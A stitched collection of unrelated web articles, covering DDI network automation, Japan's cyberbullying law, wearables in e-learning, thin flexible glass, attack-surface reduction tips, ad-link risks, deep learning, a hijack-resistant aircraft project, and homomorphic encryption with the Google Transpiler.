The DDI solution is “hidden” at the bottom of the layer and will probably not be consumed directly by IT applications. It can be interesting to build a set of generic functions that would be easier to use. This will allow all the infrastructure components plugged on the southbound endpoints of the abstraction layer (e.g. firewall, network device, SD-WAN appliance) to consume IP and core networking functions without having to specifically know the grammar of the DDI solution used. This abstraction can also help in proofing the data and actions performed on the DDI, for example validating that an object created is coherent and present in all the repositories that require it. This decoupling can also provide the ability to add some technical meta-data for better tracking of changes and link back to change management components.
Raising Operational Efficiency
With the IPAM repository as well as DNS and DHCP core services bound to the automation abstraction layer, all components of the infrastructure and all the clients of the layer can take advantage of the data and the automation. You can then plug in the other services by usage priority and always maintain a link towards the IPAM for storing valuable information. Think about the virtual machines correctly stored in the Device Manager, and the VLANs in the VLAN manager, they could then be used by any other component. The result is simplified integration between IT tools, faster code deployment, and an overall improvement in operational efficiency.
Automation Through IT Abstraction Layer
An automation abstraction layer is a good way to simplify operations and interoperability. Within this layer, the role of DDI is key.LEARN MORE
|
<urn:uuid:36fbaf80-219b-4c3a-894c-926570703ecc>
|
CC-MAIN-2022-40
|
https://www.efficientip.com/ddi-infrastructure-software-architecture/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00257.warc.gz
|
en
| 0.925849 | 644 | 2.546875 | 3 |
Japan’s government passed a law making cyber bullying punishable by imprisonment amid rising public concern over cyberbullying. Under the amendment to the penal code offenders convicted of cyberbullying can be jailed for up to one year, or fined about $2,200.
It’s a substantial increase from the current sentences of detention for fewer than 30 days and a fine of up to $75. The bill proved controversial in the country, with opponents arguing it could obstruct free speech and censure those in power. However, fans said tougher legislation was needed to crack down on cyberbullying and online harassment.
Insults, under Japan’s penal code, are defined as publicly demeaning someone’s reputation without the reference of specifics, whether that’s a fact about them or a specific action. This is different to defamation, which would involve specifications. Defamation and insults are punishable under the law. Lawyers are worried that the revised law gave no classification of what constitutes an insult. For example, at the moment, even if anybody calls Japan’s president an idiot, then maybe under the new law that could be classed as an insult.
Advocates of the law cite the death of 22-year-old wrestler and reality TV personality Hana Kimura as a reason it was needed. On the day she died, Kimura shared images of self-harm and hateful comments she’d got on social media. Her death was later ruled a suicide. Three men were investigated for their role in her death. One was fined a small sum, and another paid around $12,000 of damages after a civil suit brought by her family.
After the amendment was approved, Japan’s Justice Ministry was questioned if the change was suitable given international efforts to exclude defamation from criminal law and ensure it cannot result in imprisonment, and if Japan’s efforts to protect online rights might therefore harm its reputation for human rights. The Ministry rejected the possibility of that outcome.
Other countries have taken a diverse approach to contain insulting online speech, with measures that force platforms to take down posts that draw grievances, or that require the revealing of anonymous trolls.
|
<urn:uuid:11c43b76-a65e-4956-9d1d-09256dc38796>
|
CC-MAIN-2022-40
|
https://malwaredefinition.com/index.php/2022/06/16/cyber-bullying-is-now-a-crime-in-japan-culprits-can-get-up-to-a-year-of-prison-time/it-security-central/admin/?doing_wp_cron=1660184877.8281700611114501953125
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334992.20/warc/CC-MAIN-20220927064738-20220927094738-00257.warc.gz
|
en
| 0.967936 | 443 | 2.578125 | 3 |
Wearable technology or
Let’s say you are enrolled in a university course for electrical engineering and simultaneously pursuing a distance learning course to become a technician. You want to start studying through your course material right away. You put on your wearable fitness tracker, connect it to your tablet, and click on the e-learning app. You start with a difficult chapter on resistors connected in series and parallel
Project overview and goals
Motivation is a major factor to facilitate deep learning processes. It makes learning fun and interesting, and as a result improves the overall learning process. If motivational problems are detected early, the learning processes can be modified and the learning content can be adapted to the needs of the student.
The goal of the SensoMot research project is to predict critical motivational conditions using sensor measurements collected by wearable devices. By deriving adaptive mechanisms, the learning process can subsequently be tailored to meet the motivational needs of the student. Based on these objective sensor data (e.g. indicating stress or boredom) algorithms for the learning environment will adjust internal variables like the learning speed, level of difficulty or propose alternate learning paths.
Prototypes of adaptive learning scenarios for a university course on “Nanotechnology” as well as a distance learning course on “Electrical Engineering” will be implemented in the project. These will be integrated and evaluated based on the e-learning and e-testing platform “CBA ItemBuilder”, a product developed by Nagarro for its customer DIPF (German Institute for International Pedagogical Research) which is already in use for many years. The resulting learning systems will be made available to a broad variety of educational applications thereafter.
The innovation around SensoMot will facilitate (for the first time ever) detection of motivational obstacles in the way of learning, thanks to non-obtrusive sensors, and adapt learning content accordingly. Learning motivation increased in this manner could lead to greater learning success and lower dropout rates in a wide range of technology-based learning situations.
We are facing three major challenges:
- Can we find wearable devices and provide the “right” sensor data, in a streaming mode to be able to deduce motivation levels? This is not obvious as many of the commercial wearable devices do not provide open interfaces and access to raw data. Typically heart rate, skin resistance, eye tracking and mouse/keyboard movement are used in similar research projects.
- Can we apply adequate pattern recognition and machine learning techniques to infer motivation levels from raw sensor data? The intended process chain is depicted in the diagram below, which shows consolidation of different sensor data via pattern recognition and machine learning to identify motivation indicators and dynamically adapt the learning content accordingly.
- Can we ensure that this sensitive data is secure enough to build the necessary trust so that students are willing to use such a system in their e-learning process?
The result of this research could be a milestone for building adaptive learning environments and making learning processes more efficient, particularly in the context of lifelong learning. But even beyond education; for many other applications the ability to detect motivation levels can be envisaged, e.g. to assess the quality of children nursery or aged care work.
Project consortium partners
Nagarro GmbH - Munich, leading the consortium, will provide the integration of sensor data collection into the “CBA ItemBuilder” platform and develop the basic mechanisms for adapting the learning content at runtime.
The German Institute for International Educational Research (Deutsches Institut für Internationale Pädagogische Forschung) - DIPF is responsible for the scientific project co-ordination.
The distance learning institute “Fernlehrinstitut Dr. Robert Eckert GmbH” (Eckert) ) is the second commercial consortium member besides Nagarro and will provide the test bed and validation for a distance learning course on “Mechanical Engineering”. It is the natural first user of such a technology.
The “Technical University of Ilmenau” (
The Medical School Hamburg (MSH) will bring in its research competence for the theoretical and empirical identification of motivation indicators and the derivation of adaption algorithms.
The Leuphana University Lüneburg (Leuphana) will provide the machine learning technology to deduce motivation levels from the raw sensor data.
|
<urn:uuid:26818929-d886-4aa9-8581-5754ee0d76e2>
|
CC-MAIN-2022-40
|
https://www.nagarro.com/en/blog/post/92/wearables-in-education-leading-the-sensomot-research-project-
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334992.20/warc/CC-MAIN-20220927064738-20220927094738-00257.warc.gz
|
en
| 0.912462 | 915 | 3.078125 | 3 |
You can’t see it, so you probably take it for granted. But think for a moment about all the glass that you use in everyday life. From windows to windshields, light bulbs to flat panel screens, these variations of melted sand are a fundamental part of many technologies. One of the key applications is for LCD panels, which require glass that is especially smooth and uniform in thickness. Corning is the market leader in LCD glass, with Asahi Glass Company (AGC) providing a significant portion as well. Glass also works well at blocking air and water vapor, which is necessary for encapsulating OLED displays.
At present, LCD and OLED panels are made in “batch mode” production. This means that the glass substrates are cut into rectangles for processing, then then cut into individual panels. In general, larger substrates translate into more efficient production, especially for large displays (though there are indications that we may be nearing some of the limits for those efficiencies). The dream is to be able to produce displays on long ribbons of glass that move continuously through the different production steps, much like a newspaper is printed on a giant printing press using rolls of paper. Roll-to-roll processing could be much more efficient than batch processing. Among the many problems, one stands out; have you ever tried to roll up a sheet of glass?
Corning and AGC have both managed this trick, as shown in this photo. At SID 2011, both companies demonstrated glass that is just 0.1 mm thick and can be rolled up. How thick is 0.1 mm? It’s about the same thickness as a sheet of paper. Managing this material is tricky, as you might imagine. The Corning demo showed a loop of glass traveling over a series of three rollers, and plastic film was attached to the edges on both sides of the glass to protect the edges from damage as it rolled around.
Still, the advantages of this thin glass are plenty. Even if you don’t use roll-to-roll production, the glass is thinner and much lighter than standard LCD glass (which is typically 0.7 mm thick, or about the thickness of a credit card). While you can’t wrap it around a pen, it does make it possible to create more flexible displays which could lead to novel applications. The big bet, however, is that this could help lower production costs even further, and help meet the consumer’s continued expections of larger displays for less money.
|
<urn:uuid:e7b57514-d0fe-4edd-99cd-733789bf677c>
|
CC-MAIN-2022-40
|
https://hdtvprofessor.com/2011/05/26/sid-2011-100-micron-glass/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00257.warc.gz
|
en
| 0.958229 | 516 | 2.53125 | 3 |
In May, the White House introduced an Executive Order to improve the nation’s cybersecurity. Cybersecurity attacks against SolarWinds, Microsoft, and Colonial Pipeline are reminders that we face increasingly sophisticated malicious adversaries. Insufficient cybersecurity defenses have made us more vulnerable to incidents.
“It is the policy of my Administration that the prevention, detection, assessment, and remediation of cyber incidents is a top priority and essential to national and economic security. The Federal Government must lead by example. All Federal Information Systems should meet or exceed the standards and requirements for cybersecurity set forth in and issued pursuant to this order,” said President Joe Biden.
Major highlights and directives from the executive order:
- Remove Barriers to Threat Information Sharing Between Government and the Private Sector.
- Modernize and Implement Stronger Cybersecurity Standards in the Federal Government.
- Improve Software Supply Chain Security.
- Establish a Cybersecurity Safety Review Board.
- Create a Standard Playbook for Responding to Cyber Incidents.
- Improve Detection of Cybersecurity Incidents on Federal Government Networks.
- Improve Investigative and Remediation Capabilities.
The frequency of ransomware attacks has increased dramatically over the past year: 93% more ransomware attacks were carried out in the first half of 2021 than the same period last year per Computer Weekly. Attacks have also increased significantly since the pandemic has forced an increase in global remote work and thus, an increase in the attack surface of most organizations.
While the Executive Order has highlighted areas of improvement for the U.S. in the cybersecurity space, in looking at the continued increase in ransomware attacks, one of the biggest actions an organization can take to improve its security posture is to reduce its attack surface.
What is an attack surface?
An attack surface is the infinite number of ways threat actors can infiltrate your digital network. The smaller the attack surface, the fewer attack vectors – or entry points – there are for a threat actor to gain access to or to attack your system. The bigger the attack surface, the more entry points.
What are the types of attack surface?
There are three main types of attack surface:
- Digital or External attack surface: The digital attack surface also known as an external attack surface, is where threat actors or unauthorized users can exploit and/or compromise digital systems.
- Physical attack surface: Carelessly discarded hardware that might contain user data/login credentials, handwritten passwords, and physical break-ins.
- Social engineering attack surface: Malicious activities accomplished through human interactions, such as phishing, baiting, pretexting, spear phishing etc.
All of these are important, but with increasing digital modernization and transformation efforts across enterprises, an organization’s digital attack surface is critical when it comes to a strong cybersecurity posture.
For example, a cyber criminal can penetrate your network to obtain private company information from the following points:
- Connected Systems & Software
- Out-of-Date Security Certificates
- Compromised Credentials
- Weak or Stolen Passwords
According to TechTarget, “There was an intense spike in the number of cyberattacks such as phishing and malware exploiting the fragility and inadequacy of the infrastructure that could support remote working, as is indicated by the U.S. federal report. Not only did the attack surface expand, but several new ones also came into play as corporate IT assets extended into home networks.”
Combining the “Inside-Out” and “Outside-in” Views for Complete Visibility
The lack of visibility into one’s infrastructure remains a fundamental cybersecurity challenge, and the extension of corporate assets into home networks has only complicated this. But often, organizations have taken an “inside-out” approach to cybersecurity.
This approach has been a foundation for cybersecurity practitioners: set up a perimeter and protect what is inside your network. Set up firewalls to stop certain traffic from flowing in and out. Implement anti-virus on endpoints so you can ensure the outer edges of your network have some ability to identify and quarantine bad or suspicious things. It’s the castle and moat approach.
What has been less adopted but is as critical to reducing one’s attack surface is understanding the “outside-in” approach to your networks: your external attack surface. According to Gartner’s Hype Cycle for Security Operations – 2021, “External Attack Surface Management (EASM), autonomous security testing, and threat intelligence services all provide an inward-looking viewpoint toward an organization’s infrastructure from the outside. This renewed approach to looking at exposure provides better enrichment for organizations to decide what really matters to them — without having to look at the threat landscape in a more general way and wonder if they are affected.”
This doesn’t mean you should give up on the “inside-out” view – only that this view of your attack surface needs to provide broader insight into assets and interfaces on your network. In addition to EASM, another area of interest in the Gartner Hype Cycle for Security Operation – 2021report is Cyber Asset Attack Surface Management (CAASM). “CAASM is an emerging technology focused on enabling security teams to solve persistent asset visibility and vulnerability challenges.” It expands focus on a subset of assets such as endpoints, servers, devices, or applications. It also helps remediate gaps caused by manual processes and homegrown systems. With CAASM, an organization gains full visibility into all organizational assets to better understand their attack surface area and any possible existing security control gaps.
When organizations only look at the internal viewthey are playing defense. With an “outside-in” approach, you can proactively mitigate cyber risk and prioritize defensive actions. Only with both can you strategically defend critical systems and data with a risk-based strategy.
How to reduce your attack surface
The smaller the attack surface the fewer entry points cyber criminals have to penetrate your network. Here are a handful of tactics you can do to reduce your attack surface:
- Assume zero trust. Don’t automatically trust anything inside or outside your network perimeters. Verify everything trying to connect to your systems before granting access.
- Create strong access protocols and use strong authentication policies. Strong protocols and policies can help protect your network.
- Promote the use of a password manager. Set strong and unique passwords across different employee accounts.
- Backup often and protect your backups. You should assume that your network will be breached, so make sure that you have properly stored and protected backups.
- Increase your firewalls and segment your network. Firewalls help defend from any cyberattack.
- Ensure email security. Keep employees trained to look for suspicious requests, attachments, links, and phishing activities.
- Monitor third-party data breaches. According to a report by Ponemon Institute, 51% of businesses have suffered a data breach caused by a third-party.
- Monitor for data leaks. Monitor for company data leaks. The faster you know about a potential breach, the quicker you can mitigate the situation.
- Remove unnecessary software and services. The more software connecting to your network – the bigger your attack surface.
- Invest in cybersecurity awareness training. Keep your employees up to date on cybersecurity training and tactics. Employees and contractors are a significant cause of data breaches.
LookingGlass’s data, platforms, and enrichment can help your organization quickly understand common attacks, focus your defenses by leveraging tailored datasets, and move you toward a more proactive stance against the most common threats. Find out more by contacting us today to book a demo.
|
<urn:uuid:2994e918-185c-42e4-a36a-82912106c2fc>
|
CC-MAIN-2022-40
|
https://lookingglasscyber.com/blog/threat-intelligence-insights/10-tips-to-reduce-your-attack-surface/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00257.warc.gz
|
en
| 0.932779 | 1,583 | 2.828125 | 3 |
Most of us have also probably fallen for clicking an ad instead of a link for the original website that we were searching for whether we know it or not. When we search on Google for a certain topic or request, we expect and rely on the fact that we will gain the answer we are looking for quite easily. What if I told you that ad links can be a potential threat to your computer processes?
Recently, a client of ours was looking for groceries and searched for a local grocery store. Believing that the first hyperlink she saw was the original website she could order from, she was faced with an ad that redirected her to a completely different website not linked to the store. The new website began to track the specific items she was interested in, such as buying food and drink products. Essentially, this resulted in the customers having a plethora of ad pop-ups for different grocery items.
What is an advertisement link?
Law Insider states that, “Advertising Links means a hypertext link or other mechanism through which advertising is made available to or accessible by user selection” (Lawinsider).
An example of an ad link is if you search on Google, the first link you may see most likely will be an ad. The link will either redirect you to the marketing page of the website you’re searching or to an entirely different webpage that can potentially harm your computer processes.
How do I know if I am clicking an ad link versus the actual result I’m looking for?
Usually when searching for a specific website, you may want to click the first link that you see. However, pay attention to the title of the website’s name and whether you see “ad” in the beginning of the title. If you do, this may not be the website you are looking for.
Also, pay attention to the hyperlink. If it does not consist of the website’s original name, then this also may not be what you are looking for.
Additionally, even if you may be searching to buy a certain item, these ads still do not give the best results. It is good practice to click on a trusted website rather than an ad.
Here is an example shown below.
So, what are the potential threats in clicking advertising links?
Overall, when surfacing the web, pay attention to all links that you may be clicking on. Some ads may redirect you to a malicious website asking to enter private information. Others may trigger a popup that will prompt you to click on a button to “remove detected viruses”. In reality, clicking the button will install them. Avoiding ads decreases the potential threats to your computer and untrusted websites.
Infiniwiz helps companies to create more unified business functions, improve customer service, and utilize technology to move forward. Chicago experienced IT consulting experts will make your technology work for you and keep you from spending endless, frustrating hours managing your business IT.
|
<urn:uuid:97e8eea4-016f-4095-b5a4-d87f258df945>
|
CC-MAIN-2022-40
|
https://www.infiniwiz.com/how-ad-links-can-affect-your-electronic-devices/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335573.50/warc/CC-MAIN-20221001070422-20221001100422-00257.warc.gz
|
en
| 0.942518 | 606 | 2.53125 | 3 |
- April 26, 2019
- Posted by: admin
- Category: Artificial Intelligence
Over the past few years, technology users have noticed rapid evolution of technology in leaps and bounds. From speech-recognition functions in our smartphones to machine translation, this technological boom has given rise to fascinating new features with every passing day; the latest of the lot being image recognition.
Now, one very obvious question that arises in the mind is, how are these things made possible?
And that is how we are brought face-to-face with the family of AI techniques called deep learning. Deep learning is still acknowledged by many scientists as ‘deep neural networks’ in the realms of Artificial Intelligence.
How did these neural networks come into being?
It might be surprising but the concept of neural nets goes back to as early as the 1950s. Most of the key algorithmic discoveries were actually around the 1980s and 1990s, which are now harnessed by computer scientists of this generation.
But the most remarkable factor of neural nets is that no human being has actually designed a computer to perform the breakthroughs. It is the effort of the programmers in feeding the computer with countless algorithms, data, and images so that the machine recognizes particular sentences or identifies patterns.
What is deep learning?
As mentioned before, deep learning belongs to the vast world of Artificial Intelligence. The intention of AI is to improvise robots so that they can engage in problem-solving using deep thinking, like us humans.
Another subset of AI is Machine Learning, which involves mathematical techniques that help a computer accomplish complex tasks. In this family of Machine Learning, lies this small wonder, known as deep learning. The idea behind the application of deep learning technique is to enable a software application to train itself to complete certain tasks like speech and image recognition. It works by exposing multi-layered neural networks to huge volumes of data.
Interestingly enough, according to AI experts, this technology has the power to transform any industry within a fortnight.
Although computers are definitely becoming more intelligent, it does not mean that the day is already here when super-intelligent machines can do everything by themselves without the intervention of human beings. Neural networks only excel at recognizing patterns better than humans. But they lack the perspective of reasoning that we are gifted with. To know more, deep learning tutorials can be found online.
What is the future of deep learning?
Currently, many companies have taken over projects to explore deep learning applications and make the most of them in their field. Some companies are also looking forward to implementing deep learning in their day to day operations. Such advanced applications have been commercially used by giant corps like Google, Facebook, Amazon and the likes, who generate vast amounts of data every second. Most of these companies plan to develop more realistic and helpful automated machines like “bots”, by utilizing deep learning, to enrich their customer services.
Top technological organisations are also incorporating Deep learning to excel in other spheres. For instance, Google launched a project based on deep-learning in 2011 and then started installing neural nets in its speech recognition products from 2012. Currently, the company is running about 1000 deep-learning projects. Also, while Microsoft Corporation started using the technology for its commercial speech-recognition products, it is now working to employ neural networks for photo search, translation system, and search rankings.
The breakthroughs of deep learning technology are not merely confined within the borders of the technology industry only. Deep learning applications are also being extensively used in medical and healthcare organisations, to help them achieve greater accuracy in diagnosis and treatment of patients.
|
<urn:uuid:2835e0bb-1567-4656-ac4c-fc4c5665ceba>
|
CC-MAIN-2022-40
|
https://www.aretove.com/deep-learning-suddenly-changing-future
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00257.warc.gz
|
en
| 0.959369 | 733 | 3.578125 | 4 |
In the wake of a foiled terrorism plot targeting aircraft departing from Great Britain, European researchers are pushing hard to create a non-hijackable plane. The security program could combat on-board threats by 2008.
The non-hijackable plane would feature technology designed to serve as a last barrier to attacks on planes in flight. The vessel would include computer systems designed to spot suspicious passenger behavior and a collision avoidance system that would adjust the plane’s trajectory to prevent it from being diverted from its course.
The researchers are also attempting to develop an on-board computer that could act as an automatic pilot, directing the plane to the nearest airport even in the midst of a hijack. That feature, though, could be 15 years off.
SAFEE and Sound
The four-year, 35.8 million euro (US$49 million) non-hijackable plane project is called SAFEE, or Security on Aircraft in the Future European Environment. It was launched in 2004 and includes partners such as Airbus, BAE Systems and Siemens.
Initiatives include an on-board threat detection system based on processing multiple sensor information, a threat assessment and response management system and decision support tool, flight reconfiguration and a study of an automatic guidance system to control the aircraft.
SAFEE initiatives also include a data protection system securing all the data exchanges in and out of the aircraft, security evaluation systems, legal and regulatory issues threat assessment, operational concept development, validation approach, economic analysis and training.
The SAFEE system could be commercially available as soon as 2010, but some security experts are skeptical.
An Unsinkable Ship
“The Titanic was billed as the ship that was unsinkable. Now we know that there is no ship in this world that is unsinkable, no plane that is non-hijackable and no marriage that is undivorceable,” Dr. Britt Marshall, a former law enforcement officer and INTERPOL agent, told TechNewsWorld.
“If a hijacker gets on board the plane, he can merely kick open a door and everybody inside would be dead in a matter of minutes,” he continued.
Marshall is faithful to the recommendation he made to the government back in 1978: Move airports away from major metropolitan areas.
Washington National, Midway and LaGuardia airports, he said, are in the heart of their cities and there is no time to recover if hijackers decide to crash a plane into the Pentagon, White House or Empire State Building.”Hijackers are ideologues. If someone wants to do something bad, they will find a way to do it,” Marshall said. “So I don’t believe there will be a non-hijackable plane, but this is a good project nonetheless.”
|
<urn:uuid:d21b6c09-34db-47d1-bb40-0eb1ccfc533d>
|
CC-MAIN-2022-40
|
https://www.linuxinsider.com/story/european-researchers-seek-to-develop-non-hijackable-plane-52405.html
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337595.1/warc/CC-MAIN-20221005073953-20221005103953-00257.warc.gz
|
en
| 0.958303 | 589 | 2.65625 | 3 |
Adventures in Making Arbitrary Computation with Fully Homomorphic Encryption a Practical Reality
Encrypted Computation: Who, What, How and Why?
A core privacy preserving technology for computing on data while it is encrypted is Homomorphic Encryption (HE). This is a form of encrypting data that allows users to share their sensitive data in encrypted form, perform computation on the data (for example, within the cloud on an unsecure system) without ever decrypting it, finally allowing decryption and distribution of the computation results to only selected participants. OpenFHE is the next generation open-source library for building systems based on homomorphic encryption. Duality uses OpenFHE as the core cryptography library for its privacy preserving data collaboration platform. Users of the Duality platform can perform various forms of analysis (data base queries, statistics, training of machine learning models) on sensitive data that would not otherwise be made available for shared processing due to various legal limitations (such as being held in different countries, each with its own various data privacy laws). Encrypting the data and processing it while encrypted, allows the information to cross borders, and be processed in the cloud (even on unsecured systems) and satisfies all the various privacy laws simultaneously. This ability comes at a cost though. Computation on, and storage of homomorphically encrypted data is typically at least an order of magnitude larger than computation or storage in the clear.
The Alphabet Soup of Encryption Schemes
HE is implemented as one of several co-existing “schemes”, all labeled with the initials of the researchers that first published the approach. One fundamental restriction that currently exists, is that in all HE schemes, one needs to identify the base data type to use for all math. We’ll do a quick summary of the schemes supported in OpenFHE based on the underlying data types supported.
The Brakerski-Gentry-Vaikuntanathan (BGV) and Brakerski/Fan-Vercauteren (BFV) schemes use modulo integer encoding, where all plaintext numbers are limited to the range of unsigned numbers [ 0 .. q-1] or signed numbers [-q/2 .. q/2-1], where q is an integer chosen sufficiently large by the user so that all operations in their application are performed without having any intermediate value or final output exceed the bounds of the above range.
Approximate floating-point data:
The Cheon-Kim-Kim-Song (CKKS) is a scheme where floating-point data is mapped to an approximate representation that is not bounded, but rather is restricted in accuracy (# bits of accuracy).
TFHE and FHEW are two similar schemes where encrypted data is typically a single bit (or as a new feature in OpenFHE, a very small integer). We collectively call these schemes BinFHE (short for “Binary FHE”) in OpenFHE. Where BGV, BFV and CKKS all allow us to encrypt a vector of data into a single ciphertext, TFHE/FHEW deals with single bit ciphertexts.
What’s the Vector Victor?
BGV, BFV and CKKS are all vectorized schemes, meaning that they allow us to encrypt an entire vector of data into a single ciphertext, and perform math operations on these encrypted vectors with one function call. The operations include vector addition, element wise (Hadamard) vector multiplication, and rotation of the vector (i.e., circular shifting the entries of the vector). In general, the encrypted vector is of a length that is typically a power of two related to the parameters used when the scheme is set up. Arbitrary-length vectors are zero padded before encryption.
One more twist: The number of multiplication operations that can be performed on a ciphertext is limited based on parameters specified at run time. The more sequential multiplications that a particular data path has (referred to as multiplicative “depth”), the larger the ciphertext, and longer the computation time must be. Eventually, a limit is reached, and one must execute a “bootstrapping” function. Ciphertexts all contain some encryption “noise”, and this noise will increase in the result of each multiplication operation. The depth is the limit after which the noise becomes too large for us to successfully decrypt the ciphertext. Bootstrapping basically resets the encryption noise accumulated in a ciphertext after multiple encrypted computations. Bootstrapping is very computationally intensive and is only used in systems with very large computational depth requirements.
Note that there are operations that are missing from those we would expect from a general-purpose computer. There is no division, no nonlinear functions, and no user-level comparison operations. To get around this, researchers have implemented missing functions using polynomial and other numerical approximation techniques. Computing comparison using the polynomial approach has several challenges, e.g., the input range must be known in advance, and a high multiplicative depth (large-degree polynomial) is needed. Simply determining if x is greater than y when both are encrypted has only recently been accomplished by converting vector ciphertexts into vectors of Boolean ciphertexts and performing the comparison in that scheme.
Boolean (Digital) Circuits to the Rescue
The BinFHE schemes allow us to perform most two-input-one-output Boolean gate operations in encrypted form. Since their input and output ciphertext encrypts a single bit, they can perform bootstrapping in a way that is much more efficient than the vector schemes – to the point where most implementations perform bootstrapping after every gate computation. A sufficient set of Boolean operations are supported in OpenFHE that enable us to implement any arbitrary combinatorial circuit, limited only by the size of the system memory, and the patience of the user running the code.
With BinFHE, the computation of a comparison is achieved in a straightforward manner.
Figure 1 shows the digital logic circuit that performs the three comparison operations: greater than, less than, and equal for two four-bit inputs. It can be easily extended to larger integers. However, implementing this circuit directly into a Boolean scheme is not easy. There are three approaches we could use:
Approach 1: By hand
I would design the circuit, break it down into gates and nodes (i.e., wires), each node being a one-bit ciphertext and each gate being the appropriate OpenFHE call for the particular gate. Then systematically lay out the code (going left to right, top to bottom) that will execute the circuit using OpenFHE calls. Trust me, this is both tedious and error-prone, and is not practical for circuits of any significant size.
Approach 2: Build a generic circuit emulator
I could write code that reads in a circuit description from a file (consisting of labeled nodes and gates) and automagically generates and executes the OpenFHE calls for each gate in the correct order. This is a non-trivial piece of code, but if you want to kick the tires, fortunately I have already written it. It is available as an example application in the PALISADE repository at will soon be available for OpenFHE. While there are some big circuits in the repo, the data I/O is still basically limited to a small number of simple integers of fixed bit-width (i.e., one or two inputs, and one or two outputs).
Approach 3: Use the Google Transpiler
The Google Transpiler is a new open-source tool written by our collaborators at Google that will translate C++ code into hardware design language (HDL) code that describes the functionality of the original code as a digital circuit. It can then execute the circuit in encrypted form using one of multiple cryptographic libraries, but I will focus on our experiences with OpenFHE.
Translation + Compiler = Google Transpiler
The Google Transpiler is a new system that converts a subset of C++ into a Boolean circuit and integrates OpenFHE’s Boolean schemes as a computational backend to evaluate the circuits with encrypted inputs and outputs. Generally, you write your application using a specific subset of C++ (the limitation is that not all C++ code can be converted to a static combinatorial digital circuit). You specifically encode/encrypt your sensitive input data and specify functions that will be converted to encrypted operations.
The system can be compiled into a “cleartext” form where all variables are encoded into bits, and the resulting circuits executed in the clear. This runs fast, and lets you confirm the correctness of your system. With a small number of changes, this code can be converted to an encrypted form. Running in encrypted form encodes and encrypts the C++ variables as vectors of encrypted bits and executes the functions using OpenFHE calls to the various gates. The conversion of C++ into gates happens under the hood, and you can easily generate very large circuits with little effort. Furthermore, Google has incorporated the Yosys open-source HDL tool chain to generate efficient circuits for execution and included an “interpreted mode” that executes the encrypted gates in parallel across all available cores in your system.
The transpiler supports signed and unsigned integers, shorts, and chars, as well as bool. These are represented internally as vectors of ciphertexts (each encrypting one bit). Floating point is not currently supported, nor is pointer arithmetic. The power of the transpiler becomes apparent when you look at larger, more complex data structures that are supported. You can specify fixed-length multi-dimensional vectors and arbitrary structures. The transpiler takes care of all the bookkeeping that keeps all the underlying ciphertexts straight.
An example application: picking the most efficient of two paths
I built a graph processing application that computes a shortest path. In this application we take two data structures which contained an unsigned integer field called “cost” and a vector of unsigned integers representing a path through a series of nodes in a graph. The goal is to select the struct with the smallest cost. This can be applied sequentially across multiple input paths, allowing us to select a path with the smallest associated cost, solving a shortest path problem.
The structure is defined with conventional C++ code in Figure 2. Some observations: Since the data is going to be encrypted, we must define the vector as a fixed-length array and store the actual length of the array that contains valid data. Otherwise, if the array was allowed to be dynamic, the length of the vector (based on the number of encoded ciphertexts) would be visible. Internally, an encrypted PathStruct is stored as a vector of 1000 Ciphertexts (one unsigned int is 32 bits, so the entire structure is 32 + 8 + 30 * 32 = 1000 bits). One of the beauties of the Google Transpiler is that it takes care of the underlying ciphertext management. Doing this by hand-coding would be very cumbersome (and error-prone).
The encrypted function is listed in Figure 3. It takes two encrypted input Path Structs and returns a copy of the one that has the smallest cost.
Some more observations: the result of the cost comparison is captured in the bool
chooseNew. We need to copy every element of the lowest cost struct, one by one into an output copy using the conditional ternary operator
a?b:c. The first
#pragma statement tells the Google Transpiler that this is the entry point of the transpiled code, The transpiled function can consist of several function modules specified in the same files, but the entry point needs to be explicitly called out. The second
#pragma statement indicates that the loop must be unrolled before it is converted to logic gates (generated circuits are always combinatorial, not sequential). A word of caution, unrolled loops generate duplicate code for every instance, so double unrolled loops can lead to extremely large circuits!
The top-level code for cleartext execution mode is shown in Figure 4. Instead of encrypting ciphertext, we make encoded versions of
PathStruct, encode our data as plaintext bits, and execute the transpiled function in the clear.
The transpiled circuit execution is the
select_path() function call, wrapped with the
XLS_CHECK() function in order to provide some error checking in case the execution fails. Notice the return value is added as a final parameter in the function call. Running code in this mode quickly verifies that the functionality is correct.
The top-level code for OpenFHE mode (encrypted) is shown in Figure 5 and is very similar to the Cleartext version with the following additions. An OpenFHE ciphertext context and the generation of keys are required at the beginning of the program. The secret key is used to encrypt and decrypt the data (OpenFHE currently only supports symmetric key operation for Boolean schemes, with public/private key operation slated for the next major release). In a real-world application, one program would use the secret key to encrypt and decrypt ciphertexts, transmitting them to a different application which performs the computation (without knowledge of the secret key). The “encoding” and “decoding” operations in the code are replaced with “encrypt” and “decrypt” operations that require the secret key sk. The circuit execution of the function
select_path() is identical except for the addition of the crypto context as a parameter).
Google Transpiler and OpenFHE Performance:
The operation counts of the circuit generated by the transpiler for
select_path() is summarized in Table 1. It consists of 2214 internal nodes (wires) which correspond to individual one-bit ciphertexts. The I/O (three copies of
PathStruct) consists of 3000 ciphertexts. Internally there are 3159 encrypted gates calls to OpenFHE bingate calls. Imagine generating this code by hand!
Next Steps for OpenFHE and the Google Transpiler
The OpenFHE team is working closely with Google to improve both OpenFHE’s BinFHE implementation and the transpiler itself. Our eventual goal is to work towards enabling a wider array of data types, such as mixing Boolean integer and approximate floating-point schemes under the hood to support more efficient operations. The OpenFHE team is currently working on being able to convert between CKKS and FHEW ciphertexts, allowing users to compute on floating point data, and perform comparison operations as well. This will enable implementation of valuable applications such as decision trees. We are also working to increase the number of Boolean gate components supported by OpenFHE, which will lead to even more efficient circuit implementations.
Meanwhile we are using the Google Transpiler to explore encrypting other algorithms for new application domains. Stay tuned for future blog posts on this subject – or, join the OpenFHE community here.
|
<urn:uuid:d1b1e228-6dbe-41e4-b00d-ce7f5aab3d68>
|
